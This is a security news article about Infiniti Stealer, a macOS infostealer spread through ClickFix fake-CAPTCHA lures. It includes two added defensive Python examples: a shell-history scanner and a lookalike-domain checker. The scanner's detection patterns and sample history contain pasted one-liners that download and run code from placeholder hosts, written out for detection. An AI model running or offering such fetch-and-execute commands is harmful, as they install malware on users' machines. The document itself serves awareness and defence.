- Malwarebytes discovers Infiniti Stealer targeting macOS via ClickFix social engineering
- Victims were tricked into executing malicious Terminal code, bypassing traditional defenses
- Stealer compiled with Nuitka, exfiltrates browser credentials, keychain data, wallets and screenshots
macOS devices are increasingly being targeted by malware, as security researchers discover another information-stealing variant in the wild.
Malwarebytes has published a detailed report on malware called Infiniti Stealer, which was apparently compiled in a rather unusual way.
Infiniti Stealer is apparently distributed via a ClickFix social engineering attack. A ClickFix attack deceives the victim by presenting a “problem” and, at the same time, offering a “solution”. In this case, Malwarebytes says victims are redirected to check for updates.[.]com (most likely via phishing emails claiming that certain software needs to be updated to work properly) where they are shown a harmless-looking CAPTCHA.
Compiled with Nuitka
Besides the usual “I’m not a robot” checkbox, the CAPTCHA has one additional step (which should also serve as a major red flag): open Spotlight (the built-in search tool), run Terminal, and paste the given code. This code executes a dropper which, in turn, delivers Infiniti Stealer.
“Since the user executes the command directly, many traditional defenses are bypassed,” Malwarebytes explained. “There are no exploits, no malicious attachments and no drive-by downloads.”
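Because the victim types or pastes the command themselves, the best host-side evidence of a ClickFix lure is often the shell history rather than a downloaded file. The following is an added example, not code from the Malwarebytes report or from TechRadar: it scans shell-history lines (including zsh extended-history format) for the generic shapes such pasted one-liners tend to take, such as a remote fetch piped straight into a shell or a base64 blob decoded into one. The patterns and the sample history lines are constructed for illustration; they are not indicators from the actual campaign.

```python
import os
import re
from typing import Dict, List

# Heuristics for one-liners a victim might be told to paste into Terminal.
# These are constructed for this example, not signatures from the report.
CLICKFIX_PATTERNS = [
    ("remote-fetch-piped-to-shell", re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z)?sh\b")),
    ("base64-decode-to-shell", re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(ba|z)?sh\b")),
    ("eval-of-command-substitution", re.compile(r"\beval\b.*\$\(")),
    ("quarantine-attr-removal", re.compile(r"\bxattr\b.*com\.apple\.quarantine")),
    ("download-then-chmod-exec", re.compile(r"\b(curl|wget)\b.*;\s*chmod\s+\+x")),
]

# zsh extended history prefixes each entry with ": <epoch>:<elapsed>;"
ZSH_EXTENDED_PREFIX = re.compile(r"^: \d+:\d+;")

# Constructed sample history (not real victim data). Line 3, 4 and 6 are
# suspicious; the rest is everyday use.
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "git status",
    "curl -fsSL https://updates.example.invalid/verify.sh | bash",
    "echo bHMgLWxh | base64 -d | sh",
    "brew update",
    ": 1712345678:0;curl -o /tmp/upd https://cdn.example.invalid/upd; chmod +x /tmp/upd; /tmp/upd",
]


def strip_zsh_prefix(line: str) -> str:
    """Return the bare command from a plain or zsh extended-history line."""
    return ZSH_EXTENDED_PREFIX.sub("", line.rstrip("\n"))


def scan_history_lines(lines: List[str]) -> List[Dict]:
    """Flag history lines matching any ClickFix-style heuristic.

    Returns one record per flagged line with its 1-based line number, the
    command text and the list of indicator names that matched.
    """
    findings = []
    for line_no, raw in enumerate(lines, start=1):
        cmd = strip_zsh_prefix(raw)
        hits = [name for name, rx in CLICKFIX_PATTERNS if rx.search(cmd)]
        if hits:
            findings.append({"line_no": line_no, "command": cmd, "indicators": hits})
    return findings


def scan_history_file(path: str) -> List[Dict]:
    """Scan a history file on disk, e.g. ~/.zsh_history (assumed default shell)."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return scan_history_lines(fh.readlines())


if __name__ == "__main__":
    for f in scan_history_lines(SAMPLE_HISTORY):
        print(f"line {f['line_no']}: {', '.join(f['indicators'])}\n    {f['command']}")
    default_history = os.path.expanduser("~/.zsh_history")
    if os.path.exists(default_history):
        for f in scan_history_file(default_history):
            print(f"[{default_history}] line {f['line_no']}: {', '.join(f['indicators'])}")
```

The patterns are intentionally coarse: a `curl | bash` install line from a legitimate vendor will also match, so treat a hit as a triage prompt to be checked against the user's account of what they were asked to do, not as a verdict.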
What sets this malware apart is the fact that it is written in Python, but compiled with Nuitka, a compiler that converts Python code into standalone executables or optimized binaries.
The resulting product is a native macOS binary which researchers say makes it harder to scan and detect compared to your standard Python-based malware.
“To our knowledge, this is the first documented macOS campaign combining ClickFix delivery with a Nuitka-compiled Python stealer,” Malwarebytes said.
An infostealer is a malware variant designed to exfiltrate sensitive data from target devices. Usually delivered via social engineering, infostealers are installed via droppers and attempt to upload various types of information to an attacker-controlled server, including browser data (cookies, stored passwords, cryptocurrency wallet plugins, etc.), passwords, sensitive files (.docx, .txt, .pdf and other formats), and other files deemed valuable.
Depending on the family, an infostealer may exfiltrate more or less of this data and may use different obfuscation and persistence mechanisms.
How to protect yourself from phishing and infostealers
Infiniti is capable of stealing a wide range of sensitive data. It mainly targets credentials stored by Chromium-based browsers and Firefox. It can also exfiltrate macOS keychain entries, cryptocurrency wallets, and plain-text secrets kept in developer files such as .env. Finally, it exfiltrates screenshots captured while it is running.
Social engineering is a popular scam tactic, and phishing emails remain the primary attack vector. To avoid falling prey to these campaigns, exercise caution and a high level of skepticism toward all incoming communications, whether email, instant messaging, or telephone. Double-check all links shared in the email and look for typos, letters replaced with numbers, and suspicious variations of known domains. (For example, Microsoft is often spelled with an “RN” instead of “M” in phishing emails – rnicrosoft – making it almost indistinguishable).
Be careful when downloading attachments (especially when you receive an unexpected message) and make sure you are using phishing-resistant multi-factor authentication.
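The advice above (watch for letters replaced with digits, “rn” standing in for “m”, and brand names buried in unfamiliar domains) can be turned into a simple pre-click check. This is an added example, not code from the article: it normalizes common confusable sequences, compares the registrable label of a link's host against a short list of brands you care about, and also flags hosts that are one edit away from a brand or that carry the brand only in a subdomain. The brand list, confusable table and sample links are constructed for illustration; the host parsing is deliberately naive (it takes the second-to-last label and ignores multi-part public suffixes such as co.uk).

```python
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Confusable substitutions seen in lookalike domains (constructed list; the
# "rn" -> "m" entry is the rnicrosoft case from the text). Order matters:
# multi-character sequences are replaced before single characters.
CONFUSABLES = [
    ("rn", "m"), ("vv", "w"), ("cl", "d"),
    ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("7", "t"),
]

# Brands to protect (constructed for the example).
BRANDS = ["microsoft", "google", "techradar"]

# Constructed sample links; none of these hosts is a real indicator.
SAMPLE_LINKS = [
    "https://www.microsoft.com/account",
    "https://rnicrosoft.com/login",
    "https://microsoft.account-verify.example/reset",
    "https://g00gle.com/signin",
    "https://microsofft.com/",
    "https://www.techradar.com/news",
]


def normalize_label(label: str) -> str:
    """Fold confusable character sequences to the letters they imitate."""
    s = label.lower()
    for fake, real in CONFUSABLES:
        s = s.replace(fake, real)
    return s


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance; used to catch single-typo lookalikes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        cur = [i]
        for j, cb in enumerate(b, start=1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_lookalike(host: str, brands: List[str]) -> Optional[Dict[str, str]]:
    """Return a finding if host imitates one of brands, else None.

    Naive model: the registrable label is assumed to be the second-to-last
    label, so TLD swaps and multi-part public suffixes are not covered.
    """
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return None
    sld = labels[-2]
    if sld in brands:
        return None  # the brand's own registrable label
    for brand in brands:
        if normalize_label(sld) == brand:
            return {"host": host, "brand": brand, "reason": "confusable-substitution"}
        if brand in labels[:-2]:
            return {"host": host, "brand": brand, "reason": "brand-in-subdomain"}
        if len(brand) >= 5 and levenshtein(sld, brand) == 1:
            return {"host": host, "brand": brand, "reason": "one-edit-from-brand"}
    return None


def flag_links(urls: List[str], brands: List[str] = BRANDS) -> List[Dict[str, str]]:
    """Extract each URL's host and return the findings for suspicious ones."""
    findings = []
    for url in urls:
        host = urlparse(url).hostname
        if not host:
            continue
        finding = check_lookalike(host, brands)
        if finding:
            finding["url"] = url
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in flag_links(SAMPLE_LINKS):
        print(f"{f['reason']:24} {f['host']:40} imitates {f['brand']}")
```

A tool like this is a prompt for a second look, not an allow/deny decision: a brand may legitimately run services on a domain it does not own, and the confusable table only covers what you have put in it.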
Via BleepingComputer